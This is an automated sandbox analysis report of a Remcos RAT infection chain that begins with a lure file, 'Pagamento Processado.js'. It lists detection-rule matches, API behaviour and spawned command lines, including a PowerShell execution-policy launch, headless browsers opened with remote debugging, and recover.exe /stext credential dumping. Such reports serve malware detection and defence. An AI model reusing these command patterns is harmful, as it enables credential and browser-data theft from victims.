Source: 00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: powershell.exe PID: 7336, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.7.dr

Static PE information: Section: iVN#X- ZLIB complexity 1.0013427734375

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winJS@41/14@4/6

Source: C:\Windows\SysWOW64\recover.exe

Code function: 13_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

13_2_0041A225

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		11_2_00417AD9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,		15_2_00410DE1

Source: C:\Windows\SysWOW64\recover.exe

Code function: 13_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

13_2_0041A6AF

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0040C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

11_2_0040C03C

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource,

11_2_0041B9AB

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_0041AC43

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\kent[1].ps1

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-U6XQL5

Source: C:\Windows\System32\wscript.exe

File created: C:\Temp\WTRTRWFSHS.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\recover.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: recover.exe, recover.exe, 0000000E.00000002.1439735651.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: chrome.exe, 0000000C.00000002.1549654275.0000781403728000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE browsing_topics_api_hashed_to_unhashed_domain(hashed_context_domain INTEGER PRIMARY KEY,context_domain TEXT NOT NULL)hed_context_domain,hashed_main_frame_host))Action_()}else{this.upAction_()}}}customElements.define(CrRippleElement.is,CrRippleElement);
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: chrome.exe, 0000000C.00000003.1502462494.0000781403700000.00000004.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.1476038931.000000000327B000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.1476158913.000000000327B000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.1475871981.000000000327A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2523575481.0000000003FC0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.1476360497.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: Pagamento Processado.js

ReversingLabs: Detection: 19%

Source: C:\Windows\SysWOW64\recover.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pagamento Processado.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ufrigxexiotsicyjmedmitblhoqmmy"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ehwagppqwwlwtqmnwopflynbivhvfjnzk"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pcjthi"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --no-pre-read-main-dll --field-trial-handle=2068,i,10874666967590452469,2224900250606111256,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2132 --field-trial-handle=1572,i,5104455906519316198,7108619280464206914,262144 --disable-features=PaintHolding /prefetch:3
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ufrigxexiotsicyjmedmitblhoqmmy"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ehwagppqwwlwtqmnwopflynbivhvfjnzk"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pcjthi"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --no-pre-read-main-dll --field-trial-handle=2068,i,10874666967590452469,2224900250606111256,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2132 --field-trial-handle=1572,i,5104455906519316198,7108619280464206914,262144 --disable-features=PaintHolding /prefetch:3

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
